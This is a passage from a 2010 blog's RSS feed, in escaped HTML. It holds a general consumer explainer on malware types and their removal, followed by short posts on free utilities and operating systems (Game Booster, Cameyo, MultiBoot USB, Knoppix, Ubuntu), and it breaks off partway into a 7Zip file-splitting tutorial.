You can protect yourself from viruses by making certain your antivirus application is always updated with the latest definitions and avoiding suspicious looking files coming through email or otherwise. Pay special attention to the filename—if the file is supposed to be an mp3, and the name ends in .mp3.exe, you&#39;re dealing with a virus.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBSA0DEwf0rXQKwa_wGyGwyZ7iP_KnO4FqDQwKqcJGOxol3bWworfwWqD_O9lufIYJLOjUiHzFJMdAt0EzL89kLL-VtrKeuAwCZLbBJ4juitZq-W-K1sTPDSB7iO44vrrN6avAsrR1socq/s1600/500x_sshot-2010-06-10-1-14-54-06.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgBSA0DEwf0rXQKwa_wGyGwyZ7iP_KnO4FqDQwKqcJGOxol3bWworfwWqD_O9lufIYJLOjUiHzFJMdAt0EzL89kLL-VtrKeuAwCZLbBJ4juitZq-W-K1sTPDSB7iO44vrrN6avAsrR1socq/s320/500x_sshot-2010-06-10-1-14-54-06.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&amp;nbsp; &lt;br /&gt;
&amp;nbsp;Spyware is any software installed on your PC that collects your information without your knowledge, and sends that information back to the creator so they can use your personal information in some nefarious way. This could include keylogging to learn your passwords, watching your searching habits, changing out your browser home and search pages, adding obnoxious browser toolbars, or just stealing your passwords and credit card numbers. &lt;br /&gt;
Since spyware is primarily meant to make money at your expense, it doesn&#39;t usually kill your PC—in fact, many people have spyware running without even realizing it, but generally those that have one spyware application installed also have a dozen more. Once you&#39;ve got that many pieces of software spying on you, your PC is going to become slow.&lt;br /&gt;
What many people don&#39;t realize about spyware is that not every antivirus software is designed to catch spyware. You should check with the vendor to make sure the application you are using to protect you from malware is actually checking for spyware as well. If you come across a PC that is already heavily infected, run a combination of &lt;a href=&quot;http://www.malwarebytes.org/&quot;&gt;MalwareBytes&lt;/a&gt; and &lt;a href=&quot;http://www.superantispyware.com/&quot;&gt;SuperAntiSpyware&lt;/a&gt; to clean it thoroughly.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWHXgTor4InFivmAHZNZ67VJFVPlJtZqwpEyCS3wnENiRrx-5wVdOimHFOwK2VsnhjY28LskR2XzwOCEYNL7EuuwLtVJChFxZNMAohtBisrKJF2cEH0zV5oJuoW6LMrMfNlGWAjWYavdXw/s1600/500x_sshot-2010-06-10-1-15-04-20.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWHXgTor4InFivmAHZNZ67VJFVPlJtZqwpEyCS3wnENiRrx-5wVdOimHFOwK2VsnhjY28LskR2XzwOCEYNL7EuuwLtVJChFxZNMAohtBisrKJF2cEH0zV5oJuoW6LMrMfNlGWAjWYavdXw/s320/500x_sshot-2010-06-10-1-15-04-20.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Scareware is a relatively new type of attack, where a user is tricked into downloading what appears to be an antivirus application, which then proceeds to tell you that your PC is infected with hundreds of viruses, and can only be cleaned if you pay for a full license. Of course, these scareware applications are nothing more than malware that hold your PC hostage until you pay the ransom—in most cases, you can&#39;t uninstall them or even use the PC. &lt;br /&gt;
If you manage to come across a PC infected with one of these, your best bet is to Google the name of the virus and find specific instructions on how to remove it, but the steps are usually the same—run a combination of &lt;a href=&quot;http://www.malwarebytes.org/&quot;&gt;MalwareBytes&lt;/a&gt;, &lt;a href=&quot;http://www.superantispyware.com/&quot;&gt;SuperAntiSpyware&lt;/a&gt;, and maybe &lt;a href=&quot;http://www.bleepingcomputer.com/combofix/how-to-use-combofix&quot;&gt;ComboFix&lt;/a&gt; if you need to.&lt;br /&gt;
&lt;h3 style=&quot;font-size: 120%; margin-top: 20px;&quot;&gt;Trojan Horses Install a Backdoor&lt;/h3&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8FRepuugvmwpZDp_C9NZ1XqK0izHRyzeqz2h48pWL0Lpl5nrX_f_uVbrnCvxh9SuKHVtDL9qF6Kdje_PlxTmPxtSIDQvRomy2mlN1kcNJypFw7OUmJDoFAnizWVAqOIzKCVWeqIHoRA8s/s1600/500x_sshot-2010-06-10-1-15-22-30.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8FRepuugvmwpZDp_C9NZ1XqK0izHRyzeqz2h48pWL0Lpl5nrX_f_uVbrnCvxh9SuKHVtDL9qF6Kdje_PlxTmPxtSIDQvRomy2mlN1kcNJypFw7OUmJDoFAnizWVAqOIzKCVWeqIHoRA8s/s320/500x_sshot-2010-06-10-1-15-22-30.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h3 style=&quot;font-size: 120%; margin-top: 20px;&quot;&gt;&amp;nbsp;&lt;/h3&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8FRepuugvmwpZDp_C9NZ1XqK0izHRyzeqz2h48pWL0Lpl5nrX_f_uVbrnCvxh9SuKHVtDL9qF6Kdje_PlxTmPxtSIDQvRomy2mlN1kcNJypFw7OUmJDoFAnizWVAqOIzKCVWeqIHoRA8s/s1600/500x_sshot-2010-06-10-1-15-22-30.jpg&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;Trojan horses are applications that look like they are doing something&amp;nbsp; innocuous, but secretly have malicious code that does something else. In many cases, trojans will create a backdoor that allows your PC to be remotely controlled, either directly or as part of a botnet—a network of computers also infected with a trojan or other malicious software. The major difference between a virus and a trojan is that trojans don&#39;t replicate themselves—they must be installed by an unwitting user. &lt;i&gt;Image by &lt;/i&gt;&lt;/a&gt;&lt;i&gt;&lt;a href=&quot;http://www.flickr.com/photos/mount_otz/217834848/&quot;&gt;otzberg&lt;/a&gt;&lt;/i&gt; &lt;/div&gt;Once your PC has been infected with the trojan, it can be used for any number of nefarious purposes, like a denial of service (DoS) attack against a web site, a proxy server for concealing attacks, or even worse—for sending out buckets of spam. Protection against trojans works the same way as viruses—make sure that your antivirus application is up to date, don&#39;t open suspicious attachments, and think long and hard before you try and use a downloaded crack for Photoshop—that&#39;s &lt;a href=&quot;http://mac.blorge.com/2009/01/26/intego-discovers-iservices-trojan-in-photoshop-serializer/&quot;&gt;one of malware authors&#39; favorite spots to hide a trojan&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;h3 style=&quot;font-size: 120%; margin-top: 20px;&quot;&gt;Worms Infect Through the Network&lt;/h3&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbyCU1iUjUwVF1gSYXPO56tZyVqyKLx5zn3Bup3ptUJ6m_Pp72tfxctV8k5gxzTSIowzOdoziZytQQHYnUSZ0w83LQ2Bs_4B7UOYkTEzaf2HGQqcO3fq8Ar8CN7KVn4Yz_mNuLJ4UXil_R/s1600/340x_3905417955_62700435d2.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbyCU1iUjUwVF1gSYXPO56tZyVqyKLx5zn3Bup3ptUJ6m_Pp72tfxctV8k5gxzTSIowzOdoziZytQQHYnUSZ0w83LQ2Bs_4B7UOYkTEzaf2HGQqcO3fq8Ar8CN7KVn4Yz_mNuLJ4UXil_R/s320/340x_3905417955_62700435d2.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h3 style=&quot;font-size: 120%; margin-top: 20px;&quot;&gt;&amp;nbsp;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbyCU1iUjUwVF1gSYXPO56tZyVqyKLx5zn3Bup3ptUJ6m_Pp72tfxctV8k5gxzTSIowzOdoziZytQQHYnUSZ0w83LQ2Bs_4B7UOYkTEzaf2HGQqcO3fq8Ar8CN7KVn4Yz_mNuLJ4UXil_R/s1600/340x_3905417955_62700435d2.jpg&quot; style=&quot;color: black; font-weight: normal; margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;color: black;&quot;&gt;&lt;/span&gt;&lt;/a&gt;&lt;i style=&quot;font-weight: normal;&quot;&gt;&lt;/i&gt;&lt;/h3&gt;Computer worms use the network to send copies of themselves to other PCs, usually utilizing a security hole to travel from one host to the next, often automatically without user intervention. Because they can spread so rapidly across a network, infecting every PC in their path, they tend to be the most well-known type of malware, although many users still mistakenly refer to them as viruses. Image by me and the sysop&lt;br /&gt;
&lt;br /&gt;
Some of the most famous worms include the &lt;a href=&quot;http://en.wikipedia.org/wiki/ILOVEYOU&quot;&gt;ILOVEYOU&lt;/a&gt; worm, transmitted as an email attachment, which cost businesses upwards of 5.5 billion dollars in damage. The &lt;a href=&quot;http://en.wikipedia.org/wiki/Code_Red_worm&quot;&gt;Code Red worm&lt;/a&gt; defaced 359,000 web sites, &lt;a href=&quot;http://en.wikipedia.org/wiki/SQL_slammer_worm&quot;&gt;SQL Slammer&lt;/a&gt; slowed down the entire internet for a brief period of time, and the &lt;a href=&quot;http://en.wikipedia.org/wiki/Blaster_worm&quot;&gt;Blaster&lt;/a&gt; worm would force your PC to reboot repeatedly.&lt;br /&gt;
Because worms often exploit a network vulnerability, they are the one type of malware that can be partially prevented by making sure your firewall is enabled and locked down—you&#39;ll still need an updated antivirus software, of course.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;  &lt;/span&gt;</description><link>http://hack-fun.blogspot.com/2010/09/whats-difference-between-viruses.html</link><author>noreply@blogger.com (Manpreet)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkn_3iAq48ow2pqSKAHjKtyxk6Espv0UrFN17yKEY4QFwIHxNFJp2beMOks71HmpotpeMyANH0Ym7Fi7dYcWiV55-ViV-O9XKF_KgngGBJDhG7PNdaxIRIO1faazs3jhwa8vTrLThAK0A_/s72-c/500x_sshot-2010-06-10-1-14-56-26.jpg" height="72" width="72"/><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3484615790471358750.post-3207015767508671846</guid><pubDate>Sun, 19 Sep 2010 14:40:00 +0000</pubDate><atom:updated>2010-09-19T20:10:43.167+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Softwares</category><title>Game Booster Optimizes Your PC for Gaming</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2XqyRbaYIuToWjfKu6dfXyNDQ6fLDpRupn8upbAtty11gfMtvWXPllVVlt-q4Bk_64p6620VxycZbr7zZFQwi9gvAlUQ843POUjNEHAJuYNDrqrd4mZyt37yhNZq_lmsYAcxdAIfqSxev/s1600/500x_gamebooster.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2XqyRbaYIuToWjfKu6dfXyNDQ6fLDpRupn8upbAtty11gfMtvWXPllVVlt-q4Bk_64p6620VxycZbr7zZFQwi9gvAlUQ843POUjNEHAJuYNDrqrd4mZyt37yhNZq_lmsYAcxdAIfqSxev/s320/500x_gamebooster.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
If you find it troubling to stop running applications, clear out RAM, update drivers, and otherwise get your system ready for a gaming session, free app Game Booster will do it all for you, according to your preferences.&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;br /&gt;
Game Booster gives you a number of preferences for when you&#39;re running a game, from which background applications can quit to small tweaks to optimize processor performance and clean RAM. After specifying your preferences, you can go into &quot;Gaming mode&quot; with the flip of a switch. Then, when you&#39;re done playing, you can just switch gaming mode back off and go back to your regular desktop experience.&lt;br /&gt;
&lt;br /&gt;
It also has a few other features, like checking for important driver updates, downloading popular game add-ons, and defragmenting your game folders. If you find that your desktop setup isn&#39;t optimal for gaming, it&#39;s a nice tool to let you spend more time gaming and less time tweaking your computer before every session. And, of course, don&#39;t forget to overclock your graphics card with previously mentioned EVGA Precision for an even bigger performance boost.&lt;br /&gt;
&lt;br /&gt;
Game Booster 2 Beta is a free download, Windows only.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://www.iobit.com/gamebooster2beta.html&quot;&gt;&lt;b&gt;&lt;span class=&quot;fullpost&quot;&gt;Download Game Booster  &lt;/span&gt;&lt;/b&gt;&lt;/a&gt;</description><link>http://hack-fun.blogspot.com/2010/09/game-booster-optimizes-your-pc-for.html</link><author>noreply@blogger.com (Manpreet)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2XqyRbaYIuToWjfKu6dfXyNDQ6fLDpRupn8upbAtty11gfMtvWXPllVVlt-q4Bk_64p6620VxycZbr7zZFQwi9gvAlUQ843POUjNEHAJuYNDrqrd4mZyt37yhNZq_lmsYAcxdAIfqSxev/s72-c/500x_gamebooster.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3484615790471358750.post-7199388221724097414</guid><pubDate>Sun, 12 Sep 2010 14:35:00 +0000</pubDate><atom:updated>2010-09-12T20:07:18.514+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Softwares</category><title>Create a Portable Version of Just About Any Program</title><description>&lt;div style=&quot;color: black;&quot;&gt;&lt;br /&gt;
&lt;object height=&quot;385&quot; width=&quot;500&quot;&gt;&lt;param name=&quot;movie&quot; value=&quot;http://www.youtube.com/v/hQyS24OY6PM&amp;amp;color1=0xb1b1b1&amp;amp;color2=0xd0d0d0&amp;amp;hl=en_US&amp;amp;feature=player_embedded&amp;amp;fs=1&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowFullScreen&quot; value=&quot;true&quot;&gt;&lt;/param&gt;&lt;param name=&quot;allowScriptAccess&quot; value=&quot;always&quot;&gt;&lt;/param&gt;&lt;embed src=&quot;http://www.youtube.com/v/hQyS24OY6PM&amp;amp;color1=0xb1b1b1&amp;amp;color2=0xd0d0d0&amp;amp;hl=en_US&amp;amp;feature=player_embedded&amp;amp;fs=1&quot; type=&quot;application/x-shockwave-flash&quot; allowfullscreen=&quot;true&quot; allowScriptAccess=&quot;always&quot; width=&quot;500&quot; height=&quot;385&quot;&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;&lt;div style=&quot;color: black;&quot;&gt;&lt;br /&gt;
&lt;div style=&quot;color: #f1c232;&quot;&gt;Windows only: If you&#39;re a big fan of portable applications, but there isn&#39;t a portable version of your favorite app out there, free app Cameyo will create one for you.&amp;nbsp;&lt;/div&gt;&lt;div style=&quot;color: #f1c232;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;div style=&quot;color: #f1c232;&quot;&gt;Cameyo is extremely simple to use. Just start it up, let it take a snapshot of your PC (which can take a little while, even if you don&#39;t have a ton of stuff loaded onto it), and install your program of choice. After you&#39;re done, Cameyo will take another snapshot and package that application into a portable EXE that you can take with you anywhere and run it normally (but without it affecting the rest of the system).&lt;/div&gt;&lt;div style=&quot;color: #f1c232;&quot;&gt;The really cool thing, as you can see in the video above, is that you can install pretty much anything—even add-ons to other programs, and they&#39;ll be included in the package. This means you can bring your favorite browser pre-bundled with, say, Flash and Java, among other things. Hit the link to try it out.&lt;/div&gt;&lt;div style=&quot;color: #f1c232;&quot;&gt;Cameyo is a free download for Windows only.&lt;/div&gt;&lt;div class=&quot;related&quot; style=&quot;color: black;&quot;&gt;&lt;a href=&quot;http://www.blogger.com/goog_641748124&quot;&gt;&lt;br /&gt;
&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;related&quot; style=&quot;color: black;&quot;&gt;&lt;b&gt;&lt;a href=&quot;http://www.cameyo.com/&quot;&gt;Download cameo&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;</description><link>http://hack-fun.blogspot.com/2010/09/create-portable-version-of-just-about.html</link><author>noreply@blogger.com (Manpreet)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3484615790471358750.post-7552063106592424879</guid><pubDate>Fri, 10 Sep 2010 15:29:00 +0000</pubDate><atom:updated>2010-09-10T20:59:06.176+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Open Source Operating system</category><category domain="http://www.blogger.com/atom/ns#">Softwares</category><title>Load and use multiple OSs from your USB drive</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBiFfAwT1t0bsQRbg9jI2vsimZnFSfp_72ZEefvuXNFFbQSPBLNkZg_HzT5dBJfb9NAqo5XoTYw5Aa7x1IGgbFdlhzaEEomc4qx8csTaSfSK0Vp6JMxUGoAAqgIXTtKISl4H2VrfQ2aN1o/s1600/MultiBootISOs-USB-Creator.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBiFfAwT1t0bsQRbg9jI2vsimZnFSfp_72ZEefvuXNFFbQSPBLNkZg_HzT5dBJfb9NAqo5XoTYw5Aa7x1IGgbFdlhzaEEomc4qx8csTaSfSK0Vp6JMxUGoAAqgIXTtKISl4H2VrfQ2aN1o/s320/MultiBootISOs-USB-Creator.png&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;Ever felt like carrying your Ubuntu, Fedora, Tiny-core and all other OS’s iso in your pen drive? Yes, you can now carry all your favorite Operating systems with you wherever&amp;nbsp; you go and boot from them using the same USB drive.MultiBoot USB is a freeware which can help you to use the multiple OS iso files on the same pen drive.&lt;br /&gt;
&lt;br /&gt;
To use the MultiBoot on your pen drive it must meet some requirements first. You’ll require a FAT32 formatted pen drive and a computer which can boot from a USB device. Prefer using an 8-16 GB pen drive so that you can have more different operating systems on it.&lt;br /&gt;
&lt;br /&gt;
To start off first download the MultiBootISO’s from here . Run the executable and follow the instructions. Browse to the ISO file you want to load on your USB drive and build the bootable USB using it. You might have to format your pen drive during the process so do take a backup of all your data which is there on the pen drive.&lt;br /&gt;
&lt;br /&gt;
To add more ISO files repeat the same procedure. Restart your PC and set the highest priority for the USB drive to boot from it and done. Do give it a shot!!! :)&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.pendrivelinux.com/downloads/MultiBootISOs/MultiBootISOs-2.1.2.3.exe&quot;&gt;Download MultiBoot ISO’s (781 KB)&lt;/a&gt;&lt;br /&gt;
&lt;/span&gt;</description><link>http://hack-fun.blogspot.com/2010/09/load-and-use-multiple-oss-from-your-usb.html</link><author>noreply@blogger.com (Manpreet)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBiFfAwT1t0bsQRbg9jI2vsimZnFSfp_72ZEefvuXNFFbQSPBLNkZg_HzT5dBJfb9NAqo5XoTYw5Aa7x1IGgbFdlhzaEEomc4qx8csTaSfSK0Vp6JMxUGoAAqgIXTtKISl4H2VrfQ2aN1o/s72-c/MultiBootISOs-USB-Creator.png" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3484615790471358750.post-1879695752644047453</guid><pubDate>Thu, 09 Sep 2010 15:26:00 +0000</pubDate><atom:updated>2010-09-10T20:59:54.694+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Open Source Operating system</category><category domain="http://www.blogger.com/atom/ns#">Softwares</category><title>Knoppix - bootable CD</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNXztPzaqrrceejY1rOjYVWRLsVmrgkQ5NBFV0a4xQ6fwzFlBJV857wXbxZ6hjdwdoZqRnMJ9Dw0xiW_WjubzhniVHBUW9LNc1bo1EkTTYcpboJjUYlqykbJx8kTbiDoFRHcS9fJRNjeng/s1600/knoppix-logo.gif&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNXztPzaqrrceejY1rOjYVWRLsVmrgkQ5NBFV0a4xQ6fwzFlBJV857wXbxZ6hjdwdoZqRnMJ9Dw0xiW_WjubzhniVHBUW9LNc1bo1EkTTYcpboJjUYlqykbJx8kTbiDoFRHcS9fJRNjeng/s320/knoppix-logo.gif&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;KNOPPIX is a bootable CD with a collection of GNU/Linux software, automatic hardware detection, and support for many graphics cards, sound cards, SCSI and USB devices and other peripherals. KNOPPIX can be used as a Linux demo, educational CD, rescue system, or adapted and used as a platform for commercial software product demos. It is not necessary to install anything on a hard disk. Due to on-the-fly decompression, the CD can have up to 2 GB of executable software installed on it.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;a href=&quot;http://www.knoppix.net/get.php&quot;&gt;Download Knoppix&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt; &lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt; &lt;/span&gt;</description><link>http://hack-fun.blogspot.com/2010/09/knoppix-bootable-cd.html</link><author>noreply@blogger.com (Manpreet)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNXztPzaqrrceejY1rOjYVWRLsVmrgkQ5NBFV0a4xQ6fwzFlBJV857wXbxZ6hjdwdoZqRnMJ9Dw0xiW_WjubzhniVHBUW9LNc1bo1EkTTYcpboJjUYlqykbJx8kTbiDoFRHcS9fJRNjeng/s72-c/knoppix-logo.gif" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3484615790471358750.post-4064068771984645620</guid><pubDate>Thu, 09 Sep 2010 15:23:00 +0000</pubDate><atom:updated>2010-09-10T21:00:00.635+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Open Source Operating system</category><category domain="http://www.blogger.com/atom/ns#">Softwares</category><title>Ubuntu - Best Open source linux operating system</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT6vsUZY9nhzEbEJThn7FACX1pgAMmIujckhEX_8sQXlAC0lqQHSt43Byge-fcEgji9prkUGlK_SgidXwjFOTKjG9mugDNkMTz-YSFGb95OqFjYSHIS4u4D-VgDWkJtVyAtSSDRofxhfeK/s1600/New-Kernel-Vulnerabilities-Affect-Ubuntu-6-06-8-04-8-10-and-9-04-OSes-2.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT6vsUZY9nhzEbEJThn7FACX1pgAMmIujckhEX_8sQXlAC0lqQHSt43Byge-fcEgji9prkUGlK_SgidXwjFOTKjG9mugDNkMTz-YSFGb95OqFjYSHIS4u4D-VgDWkJtVyAtSSDRofxhfeK/s320/New-Kernel-Vulnerabilities-Affect-Ubuntu-6-06-8-04-8-10-and-9-04-OSes-2.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;span class=&quot;fullpost&quot;&gt;Ubuntu is a computer operating system originally based on the Debian GNU/Linux distribution and distributed as free and open source software with additional proprietary software available.&lt;br /&gt;
&lt;br /&gt;
Ubuntu comes installed with a wide range of software that includes OpenOffice.org, Firefox, Empathy (Pidgin in versions before 9.10), Transmission, GIMP, and several lightweight games (such as Sudoku and chess). Additional software that is not installed by default can be downloaded and installed using the Ubuntu Software Center or the package manager Synaptic, which come pre-installed. Ubuntu allows networking ports to be closed using its firewall, with customized port selection available. End-users can install Gufw (GUI for Uncomplicated Firewall) and keep it enabled.[31] GNOME (the current default desktop) offers support for more than 46 languages. Ubuntu can also run many programs designed for Microsoft Windows (such as Microsoft Office), through Wine or using a Virtual Machine (such as VMware Workstation or VirtualBox).&lt;br /&gt;
&lt;br /&gt;
Installation of Ubuntu is generally performed with the Live CD. The Ubuntu OS can be run directly from the CD (albeit with a significant performance loss), allowing a user to &quot;test-drive&quot; the OS for hardware compatibility and driver support. The CD also contains the Ubiquity installer,[33] which then can guide the user through the permanent installation process. CD images of all current and past versions are available for download at the Ubuntu web site. Installing from the CD requires a minimum of 256 MiB of RAM.&lt;br /&gt;
&lt;br /&gt;
Users can download a disk image (.iso) of the CD, which can then either be written to a physical medium (CD or DVD), or optionally run directly from a hard drive (via UNetbootin or GRUB). Ubuntu is also available on ARM, PowerPC, SPARC, and IA-64 platforms, although none but ARM are officially supported &lt;br /&gt;
&lt;br /&gt;
Wubi, which is included as an option on the Live CD, allows Ubuntu to be installed and run from within a virtual Windows loop device (as a large image file that is managed like any other Windows program via the Windows Control Panel). This method requires no partitioning of a Windows user&#39;s hard drive. Wubi also makes use of the Migration Assistant to import users&#39; settings. It is only useful for Windows users and it also incurs a slight performance loss.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://www.ubuntu.com/desktop/get-ubuntu/download&quot;&gt;&lt;span class=&quot;fullpost&quot;&gt;Download Ubuntu  &lt;/span&gt;&lt;/a&gt;</description><link>http://hack-fun.blogspot.com/2010/09/ubuntu-best-open-source-linux-operating.html</link><author>noreply@blogger.com (Manpreet)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT6vsUZY9nhzEbEJThn7FACX1pgAMmIujckhEX_8sQXlAC0lqQHSt43Byge-fcEgji9prkUGlK_SgidXwjFOTKjG9mugDNkMTz-YSFGb95OqFjYSHIS4u4D-VgDWkJtVyAtSSDRofxhfeK/s72-c/New-Kernel-Vulnerabilities-Affect-Ubuntu-6-06-8-04-8-10-and-9-04-OSes-2.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3484615790471358750.post-8190614726470185496</guid><pubDate>Fri, 03 Sep 2010 14:50:00 +0000</pubDate><atom:updated>2010-09-03T20:21:09.440+05:30</atom:updated><category domain="http://www.blogger.com/atom/ns#">Tricks</category><title>How to Send Large File on Internet for Slow Internet Connection</title><description>&lt;span class=&quot;fullpost&quot;&gt;If you have a fast internet connection you can share large files easily, but if you use dial-up connection you will not difficulties share a file with a tens megabyte/gigabyte size on internet. The only way to share large files easily you must split the file into a kilobyte or a few megabyte size.&lt;br /&gt;
&lt;br /&gt;
How to split the large file into a kilobyte size? It’s easy, almost all compression software such as WINZIP, WINRAR, 7Zip, etc can be used to split a large file into a few files in kilobyte size and all the software is very easy to use.&lt;br /&gt;
&lt;br /&gt;
On this tutorial I will discuss about share large file on internet if your internet connection slow. The software which I use on this tutorial is 7Zip software (you can search the software on Google :D ).&lt;br /&gt;
&lt;br /&gt;
&lt;b style=&quot;background-color: lime;&quot;&gt;&lt;span style=&quot;background-color: white; color: red;&quot;&gt;Here Two Easy Steps to Share Large File on Internet for Slow Internet Connection&lt;/span&gt;&lt;span style=&quot;background-color: lime;&quot;&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;1. Split the large file into few kilobytes or megabytes which you want, here how:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
